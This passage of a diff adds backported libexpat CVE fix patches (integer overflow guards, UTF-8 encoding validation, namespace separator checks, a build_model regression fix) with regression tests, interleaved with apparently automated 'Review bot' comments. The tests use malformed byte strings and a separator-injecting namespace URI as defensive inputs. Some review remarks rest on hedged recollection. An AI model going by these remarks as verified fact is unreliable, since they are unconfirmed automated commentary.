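+ unsigned char newPower = table->power + 1;
++
++ /* Detect and prevent invalid shift */
++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
++ return NULL;
++ }
++
+ size_t newSize = (size_t)1 << newPower;
+ unsigned long newMask = (unsigned long)newSize - 1;
++
++ /* Detect and prevent integer overflow */
++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
++ return NULL;
++ }
++
+ size_t tsize = newSize * sizeof(NAMED *);
+ NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
+ if (! newV)
+@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) {
+ if (dtd->scaffCount >= dtd->scaffSize) {
+ CONTENT_SCAFFOLD *temp;
+ if (dtd->scaffold) {
++ /* Detect and prevent integer overflow */
++ if (dtd->scaffSize > UINT_MAX / 2u) {
++ return -1;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
++ return -1;
++ }
++#endif
++
+ temp = (CONTENT_SCAFFOLD *)REALLOC(
+ parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
+ if (temp == NULL)
+@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) {
+ XML_Content *ret;
+ XML_Content *cpos;
+ XML_Char *str;
+- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
+- + (dtd->contentStringLen * sizeof(XML_Char)));
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
++ return NULL;
++ }
++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
++ return NULL;
++ }
++#endif
++ if (dtd->scaffCount * sizeof(XML_Content)
++ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
++ return NULL;
++ }
++
++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
++ + (dtd->contentStringLen * sizeof(XML_Char)));
+
+ ret = (XML_Content *)MALLOC(parser, allocsize);
+ if (! ret)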
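Review bot: In the second `addBinding` hunk the new overflow guards sit after `b = (BINDING *)MALLOC(parser, sizeof(BINDING));`, so both added `return XML_ERROR_NO_MEMORY;` paths exit with `b` still allocated and, as far as the hunk shows, not yet linked anywhere that would release it. Each rejected oversized binding would then leak one `BINDING`, on exactly the input the guard is meant to refuse. Moving the `len > INT_MAX - EXPAND_SPARE` test and the `#if UINT_MAX >= SIZE_MAX` block above the `MALLOC` call avoids this without new cleanup code. The first `addBinding` hunk reuses `parser->m_freeBindingList` and does not have the problem. The function body continues outside both hunks.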
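--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
@@ -0,0 +1,33 @@
+From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 22 Jan 2022 17:48:00 +0100
+Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
+ (CVE-2022-23852)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
+
+CVE: CVE-2022-23852
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d54af683..5ce31402 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2067,6 +2067,11 @@ XML_GetBuffer(XML_Parser parser, int len) {
+ keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
+ if (keep > XML_CONTEXT_BYTES)
+ keep = XML_CONTEXT_BYTES;
++ /* Detect and prevent integer overflow */
++ if (keep > INT_MAX - neededSize) {
++ parser->m_errorCode = XML_ERROR_NO_MEMORY;
++ return NULL;
++ }
+ neededSize += keep;
+ #endif /* defined XML_CONTEXT_BYTES */
+ if (neededSize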
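Review bot: The embedded patch's `diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c` line (patch line 18) disagrees with its own `--- a/lib/xmlparse.c` / `+++ b/lib/xmlparse.c` lines, so the header names two different paths for one file; the diffstat says `expat/lib/` as well. CVE-2022-23990.patch in this commit has the same kind of mismatch (`diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c`). Tools that read only `---`/`+++` are unaffected, but the inconsistency looks like hand-editing after export and makes it harder to tell which tree layout the patch was generated against, so I would make the places agree, e.g. `diff --git a/lib/xmlparse.c b/lib/xmlparse.c`. Separately, the guard `keep > INT_MAX - neededSize` is only sound when `neededSize` is non-negative at that point; its assignment is above the hunk, so that is worth confirming against the source version being patched.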
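--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
@@ -0,0 +1,49 @@
+From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 26 Jan 2022 02:36:43 +0100
+Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
+
+The change from "int nameLen" to "size_t nameLen"
+addresses the overflow on "nameLen++" in code
+"for (; name[nameLen++];)" right above the second
+change in the patch.
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/551/commits/ede41d1e186ed2aba88a06e84cac839b770af3a1
+
+CVE: CVE-2022-23990
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ lib/xmlparse.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 5ce31402..d1d17005 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5372,7 +5372,7 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (dtd->in_eldecl) {
+ ELEMENT_TYPE *el;
+ const XML_Char *name;
+- int nameLen;
++ size_t nameLen;
+ const char *nxt
+ = (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
+ int myindex = nextScaffoldPart(parser);
+@@ -5388,7 +5388,13 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ nameLen = 0;
+ for (; name[nameLen++];)
+ ;
+- dtd->contentStringLen += nameLen;
++
++ /* Detect and prevent integer overflow */
++ if (nameLen > UINT_MAX - dtd->contentStringLen) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ dtd->contentStringLen += (unsigned)nameLen;
+ if (parser->m_elementDeclHandler)
+ handleDefault = XML_FALSE;
+ }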
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
1From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Tue, 8 Feb 2022 17:37:14 +0100
4Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
5
6Upstream-Status: Backport
7https://github.com/libexpat/libexpat/pull/562/commits
8
9CVE: CVE-2022-25235
10
11Signed-off-by: Steve Sakoman <steve@sakoman.com>
12
13---
14 expat/lib/xmltok.c | 5 -----
15 1 file changed, 5 deletions(-)
16
17diff --git a/lib/xmltok.c b/lib/xmltok.c
18index a72200e8..3bddf125 100644
19--- a/lib/xmltok.c
20+++ b/lib/xmltok.c
21@@ -95,11 +95,6 @@
22 + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)] \
23 & (1u << (((byte)[2]) & 0x1F)))
24
25-#define UTF8_GET_NAMING(pages, p, n) \
26- ((n) == 2 \
27- ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p)) \
28- : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
29-
30 /* Detection of invalid UTF-8 sequences is based on Table 3.1B
31 of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
32 with the additional restriction of not allowing the Unicode
33From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
34From: Sebastian Pipping <sebastian@pipping.org>
35Date: Tue, 8 Feb 2022 04:32:20 +0100
36Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
37
38---
39 expat/lib/xmltok_impl.c | 8 ++++++--
40 1 file changed, 6 insertions(+), 2 deletions(-)
41
42diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
43index 0430591b4..64a3b2c15 100644
44--- a/lib/xmltok_impl.c
45+++ b/lib/xmltok_impl.c
46@@ -61,7 +61,7 @@
47 case BT_LEAD##n: \
48 if (end - ptr < n) \
49 return XML_TOK_PARTIAL_CHAR; \
50- if (! IS_NAME_CHAR(enc, ptr, n)) { \
51+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
52 *nextTokPtr = ptr; \
53 return XML_TOK_INVALID; \
54 } \
55@@ -90,7 +90,7 @@
56 case BT_LEAD##n: \
57 if (end - ptr < n) \
58 return XML_TOK_PARTIAL_CHAR; \
59- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
60+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
61 *nextTokPtr = ptr; \
62 return XML_TOK_INVALID; \
63 } \
64@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
65 case BT_LEAD##n: \
66 if (end - ptr < n) \
67 return XML_TOK_PARTIAL_CHAR; \
68+ if (IS_INVALID_CHAR(enc, ptr, n)) { \
69+ *nextTokPtr = ptr; \
70+ return XML_TOK_INVALID; \
71+ } \
72 if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
73 ptr += n; \
74 tok = XML_TOK_NAME; \
75From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
76From: Sebastian Pipping <sebastian@pipping.org>
77Date: Wed, 9 Feb 2022 01:00:38 +0100
78Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
79 already been validated
80
81---
82 expat/lib/xmltok_impl.c | 10 +++++-----
83 1 file changed, 5 insertions(+), 5 deletions(-)
84
85diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
86index 64a3b2c1..84ff35f9 100644
87--- a/lib/xmltok_impl.c
88+++ b/lib/xmltok_impl.c
89@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
90 switch (BYTE_TYPE(enc, ptr)) {
91 # define LEAD_CASE(n) \
92 case BT_LEAD##n: \
93- ptr += n; \
94+ ptr += n; /* NOTE: The encoding has already been validated. */ \
95 break;
96 LEAD_CASE(2)
97 LEAD_CASE(3)
98@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
99 switch (BYTE_TYPE(enc, ptr)) {
100 # define LEAD_CASE(n) \
101 case BT_LEAD##n: \
102- ptr += n; \
103+ ptr += n; /* NOTE: The encoding has already been validated. */ \
104 break;
105 LEAD_CASE(2)
106 LEAD_CASE(3)
107@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
108 state = inName; \
109 }
110 # define LEAD_CASE(n) \
111- case BT_LEAD##n: \
112+ case BT_LEAD##n: /* NOTE: The encoding has already been validated. */ \
113 START_NAME ptr += (n - MINBPC(enc)); \
114 break;
115 LEAD_CASE(2)
116@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
117 switch (BYTE_TYPE(enc, ptr)) {
118 # define LEAD_CASE(n) \
119 case BT_LEAD##n: \
120- ptr += n; \
121+ ptr += n; /* NOTE: The encoding has already been validated. */ \
122 break;
123 LEAD_CASE(2)
124 LEAD_CASE(3)
125@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
126 switch (BYTE_TYPE(enc, ptr)) {
127 # define LEAD_CASE(n) \
128 case BT_LEAD##n: \
129- ptr += n; \
130+ ptr += n; /* NOTE: The encoding has already been validated. */ \
131 break;
132 LEAD_CASE(2)
133 LEAD_CASE(3)
134From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
135From: Sebastian Pipping <sebastian@pipping.org>
136Date: Tue, 8 Feb 2022 04:06:21 +0100
137Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
138
139---
140 expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
141 1 file changed, 109 insertions(+)
142
143diff --git a/tests/runtests.c b/tests/runtests.c
144index bc5344b1..9b155b82 100644
145--- a/tests/runtests.c
146+++ b/tests/runtests.c
147@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
148 }
149 END_TEST
150
151+START_TEST(test_utf8_in_start_tags) {
152+ struct test_case {
153+ bool goodName;
154+ bool goodNameStart;
155+ const char *tagName;
156+ };
157+
158+ // The idea with the tests below is this:
159+ // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
160+ // go to isNever and are hence not a concern.
161+ //
162+ // We start with a character that is a valid name character
163+ // (or even name-start character, see XML 1.0r4 spec) and then we flip
164+ // single bits at places where (1) the result leaves the UTF-8 encoding space
165+ // and (2) we stay in the same n-byte sequence family.
166+ //
167+ // The flipped bits are highlighted in angle brackets in comments,
168+ // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
169+ // the most significant bit to 1 to leave UTF-8 encoding space.
170+ struct test_case cases[] = {
171+ // 1-byte UTF-8: [0xxx xxxx]
172+ {true, true, "\x3A"}, // [0011 1010] = ASCII colon ':'
173+ {false, false, "\xBA"}, // [<1>011 1010]
174+ {true, false, "\x39"}, // [0011 1001] = ASCII nine '9'
175+ {false, false, "\xB9"}, // [<1>011 1001]
176+
177+ // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
178+ {true, true, "\xDB\xA5"}, // [1101 1011] [1010 0101] =
179+ // Arabic small waw U+06E5
180+ {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
181+ {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
182+ {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
183+ {true, false, "\xCC\x81"}, // [1100 1100] [1000 0001] =
184+ // combining char U+0301
185+ {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
186+ {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
187+ {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
188+
189+ // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
190+ {true, true, "\xE0\xA4\x85"}, // [1110 0000] [1010 0100] [1000 0101] =
191+ // Devanagari Letter A U+0905
192+ {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
193+ {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
194+ {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
195+ {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
196+ {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
197+ {true, false, "\xE0\xA4\x81"}, // [1110 0000] [1010 0100] [1000 0001] =
198+ // combining char U+0901
199+ {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
200+ {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
201+ {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
202+ {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
203+ {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
204+ };
205+ const bool atNameStart[] = {true, false};
206+
207+ size_t i = 0;
208+ char doc[1024];
209+ size_t failCount = 0;
210+
211+ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
212+ size_t j = 0;
213+ for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
214+ const bool expectedSuccess
215+ = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
216+ sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
217+ XML_Parser parser = XML_ParserCreate(NULL);
218+
219+ const enum XML_Status status
220+ = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
221+
222+ bool success = true;
223+ if ((status == XML_STATUS_OK) != expectedSuccess) {
224+ success = false;
225+ }
226+ if ((status == XML_STATUS_ERROR)
227+ && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
228+ success = false;
229+ }
230+
231+ if (! success) {
232+ fprintf(
233+ stderr,
234+ "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
235+ (unsigned)i + 1u, atNameStart[j] ? " " : "not ",
236+ (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
237+ failCount++;
238+ }
239+
240+ XML_ParserFree(parser);
241+ }
242+ }
243+
244+ if (failCount > 0) {
245+ fail("UTF-8 regression detected");
246+ }
247+}
248+END_TEST
249+
250 /* Test trailing spaces in elements are accepted */
251 static void XMLCALL
252 record_element_end_handler(void *userData, const XML_Char *name) {
253@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
254 }
255 END_TEST
256
257+START_TEST(test_bad_doctype_utf8) {
258+ const char *text = "<!DOCTYPE \xDB\x25"
259+ "doc><doc/>"; // [1101 1011] [<0>010 0101]
260+ expect_failure(text, XML_ERROR_INVALID_TOKEN,
261+ "Invalid UTF-8 in DOCTYPE not faulted");
262+}
263+END_TEST
264+
265 START_TEST(test_bad_doctype_utf16) {
266 const char text[] =
267 /* <!DOCTYPE doc [ \x06f2 ]><doc/>
268@@ -11870,6 +11977,7 @@ make_suite(void) {
269 tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
270 tcase_add_test(tc_basic, test_utf8_in_cdata_section);
271 tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
272+ tcase_add_test(tc_basic, test_utf8_in_start_tags);
273 tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
274 tcase_add_test(tc_basic, test_utf16_attribute);
275 tcase_add_test(tc_basic, test_utf16_second_attr);
276@@ -11878,6 +11986,7 @@ make_suite(void) {
277 tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
278 tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
279 tcase_add_test(tc_basic, test_bad_doctype);
280+ tcase_add_test(tc_basic, test_bad_doctype_utf8);
281 tcase_add_test(tc_basic, test_bad_doctype_utf16);
282 tcase_add_test(tc_basic, test_bad_doctype_plus);
283 tcase_add_test(tc_basic, test_bad_doctype_star);
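Review bot: In `test_utf8_in_start_tags` the document is written with an unbounded `sprintf` into `char doc[1024]`; the inputs are short constants today, but a bounded call keeps the test safe if a longer case is ever added: `snprintf(doc, sizeof(doc), "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);`. The same test uses `bool`, `true` and `false`, and none of the runtests.c hunks adds an include, so confirm that the runtests.c being patched already pulls in `<stdbool.h>`. This patch file also concatenates four upstream commits while only the first carries the `Upstream-Status` and `CVE` tags; the change that closes the CVE is the second one (`lib: Add missing validation of encoding`), which a short line in the header could say.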
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
1From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Sat, 12 Feb 2022 00:19:13 +0100
4Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
5
6Upstream-Status: Backport
7https://github.com/libexpat/libexpat/pull/561/commits
8
9CVE: CVE-2022-25236
10
11Signed-off-by: Steve Sakoman <steve@sakoman.com>
12
13---
14 expat/lib/xmlparse.c | 6 ++----
15 1 file changed, 2 insertions(+), 4 deletions(-)
16
17diff --git a/lib/xmlparse.c b/lib/xmlparse.c
18index 902895d5..c768f856 100644
19--- a/lib/xmlparse.c
20+++ b/lib/xmlparse.c
21@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
22
23 XML_Parser XMLCALL
24 XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
25- XML_Char tmp[2];
26- *tmp = nsSep;
27+ XML_Char tmp[2] = {nsSep, 0};
28 return XML_ParserCreate_MM(encodingName, NULL, tmp);
29 }
30
31@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
32 would be otherwise.
33 */
34 if (parser->m_ns) {
35- XML_Char tmp[2];
36- *tmp = parser->m_namespaceSeparator;
37+ XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
38 parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
39 } else {
40 parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
41From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
42From: Sebastian Pipping <sebastian@pipping.org>
43Date: Sat, 12 Feb 2022 01:09:29 +0100
44Subject: [PATCH] lib: Protect against malicious namespace declarations
45 (CVE-2022-25236)
46
47---
48 expat/lib/xmlparse.c | 11 +++++++++++
49 1 file changed, 11 insertions(+)
50
51diff --git a/lib/xmlparse.c b/lib/xmlparse.c
52index c768f856..a3aef88c 100644
53--- a/lib/xmlparse.c
54+++ b/lib/xmlparse.c
55@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
56 if (! mustBeXML && isXMLNS
57 && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
58 isXMLNS = XML_FALSE;
59+
60+ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
61+ // we have to at least make sure that the XML processor on top of
62+ // Expat (that is splitting tag names by namespace separator into
63+ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
64+ // by an attacker putting additional namespace separator characters
65+ // into namespace declarations. That would be ambiguous and not to
66+ // be expected.
67+ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
68+ return XML_ERROR_SYNTAX;
69+ }
70 }
71 isXML = isXML && len == xmlLen;
72 isXMLNS = isXMLNS && len == xmlnsLen;
73From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
74From: Sebastian Pipping <sebastian@pipping.org>
75Date: Sat, 12 Feb 2022 00:51:43 +0100
76Subject: [PATCH] tests: Cover CVE-2022-25236
77
78---
79 expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
80 1 file changed, 30 insertions(+)
81
82diff --git a/tests/runtests.c b/tests/runtests.c
83index d07203f2..bc5344b1 100644
84--- a/tests/runtests.c
85+++ b/tests/runtests.c
86@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
87 }
88 END_TEST
89
90+START_TEST(test_ns_separator_in_uri) {
91+ struct test_case {
92+ enum XML_Status expectedStatus;
93+ const char *doc;
94+ };
95+ struct test_case cases[] = {
96+ {XML_STATUS_OK, "<doc xmlns='one_two' />"},
97+ {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
98+ };
99+
100+ size_t i = 0;
101+ size_t failCount = 0;
102+ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
103+ XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
104+ XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
105+ if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
106+ /*isFinal*/ XML_TRUE)
107+ != cases[i].expectedStatus) {
108+ failCount++;
109+ }
110+ XML_ParserFree(parser);
111+ }
112+
113+ if (failCount) {
114+ fail("Namespace separator handling is broken");
115+ }
116+}
117+END_TEST
118+
119 /* Control variable; the number of times duff_allocator() will successfully
120 * allocate */
121 #define ALLOC_ALWAYS_SUCCEED (-1)
122@@ -11905,6 +11934,7 @@ make_suite(void) {
123 tcase_add_test(tc_namespace, test_ns_utf16_doctype);
124 tcase_add_test(tc_namespace, test_ns_invalid_doctype);
125 tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
126+ tcase_add_test(tc_namespace, test_ns_separator_in_uri);
127
128 suite_add_tcase(s, tc_misc);
129 tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
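Review bot: The new check in `addBinding`, `if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) return XML_ERROR_SYNTAX;`, rejects every namespace URI that contains the separator character, whichever character the application passed to `XML_ParserCreateNS`. An application whose separator can legitimately appear in a URI will therefore see documents that parsed before this update fail with a syntax error. As far as I recall, upstream later relaxed this check for characters that are valid in URIs; no such follow-up is visible in this section, so it is worth confirming whether it is carried elsewhere in the series, or noting the behaviour change for users of the updated package. The body of `addBinding` continues outside the hunk.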
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
1From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Sat, 19 Feb 2022 23:59:25 +0000
4Subject: [PATCH] Fix build_model regression.
5
6The iterative approach in build_model failed to fill children arrays
7correctly. A preorder traversal is not required and turned out to be the
8culprit. Use an easier algorithm:
9
10Add nodes from scaffold tree starting at index 0 (root) to the target
11array whenever children are encountered. This ensures that children
12are adjacent to each other. This complies with the recursive version.
13
14Store only the scaffold index in numchildren field to prevent a direct
15processing of these children, which would require a recursive solution.
16This allows the algorithm to iterate through the target array from start
17to end without jumping back and forth, converting on the fly.
18
19Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
20---
21 lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
22 1 file changed, 47 insertions(+), 32 deletions(-)
23
24diff --git a/lib/xmlparse.c b/lib/xmlparse.c
25index c479a258..84885b5a 100644
26--- a/lib/xmlparse.c
27+++ b/lib/xmlparse.c
28@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
29 *
30 * The iterative approach works as follows:
31 *
32- * - We use space in the target array for building a temporary stack structure
33- * while that space is still unused.
34- * The stack grows from the array's end downwards and the "actual data"
35- * grows from the start upwards, sequentially.
36- * (Because stack grows downwards, pushing onto the stack is a decrement
37- * while popping off the stack is an increment.)
38+ * - We have two writing pointers, both walking up the result array; one does
39+ * the work, the other creates "jobs" for its colleague to do, and leads
40+ * the way:
41 *
42- * - A stack element appears as a regular XML_Content node on the outside,
43- * but only uses a single field -- numchildren -- to store the source
44- * tree node array index. These are the breadcrumbs leading the way back
45- * during pre-order (node first) depth-first traversal.
46+ * - The faster one, pointer jobDest, always leads and writes "what job
47+ * to do" by the other, once they reach that place in the
48+ * array: leader "jobDest" stores the source node array index (relative
49+ * to array dtd->scaffold) in field "numchildren".
50 *
51- * - The reason we know the stack will never grow into (or overlap with)
52- * the area with data of value at the start of the array is because
53- * the overall number of elements to process matches the size of the array,
54- * and the sum of fully processed nodes and yet-to-be processed nodes
55- * on the stack, cannot be more than the total number of nodes.
56- * It is possible for the top of the stack and the about-to-write node
57- * to meet, but that is safe because we get the source index out
58- * before doing any writes on that node.
59+ * - The slower one, pointer dest, looks at the value stored in the
60+ * "numchildren" field (which actually holds a source node array index
61+ * at that time) and puts the real data from dtd->scaffold in.
62+ *
63+ * - Before the loop starts, jobDest writes source array index 0
64+ * (where the root node is located) so that dest will have something to do
65+ * when it starts operation.
66+ *
67+ * - Whenever nodes with children are encountered, jobDest appends
68+ * them as new jobs, in order. As a result, tree node siblings are
69+ * adjacent in the resulting array, for example:
70+ *
71+ * [0] root, has two children
72+ * [1] first child of 0, has three children
73+ * [3] first child of 1, does not have children
74+ * [4] second child of 1, does not have children
75+ * [5] third child of 1, does not have children
76+ * [2] second child of 0, does not have children
77+ *
78+ * Or (the same data) presented in flat array view:
79+ *
80+ * [0] root, has two children
81+ *
82+ * [1] first child of 0, has three children
83+ * [2] second child of 0, does not have children
84+ *
85+ * [3] first child of 1, does not have children
86+ * [4] second child of 1, does not have children
87+ * [5] third child of 1, does not have children
88+ *
89+ * - The algorithm repeats until all target array indices have been processed.
90 */
91 XML_Content *dest = ret; /* tree node writing location, moves upwards */
92 XML_Content *const destLimit = &ret[dtd->scaffCount];
93- XML_Content *const stackBottom = &ret[dtd->scaffCount];
94- XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
95+ XML_Content *jobDest = ret; /* next free writing location in target array */
96 str = (XML_Char *)&ret[dtd->scaffCount];
97
98- /* Push source tree root node index onto the stack */
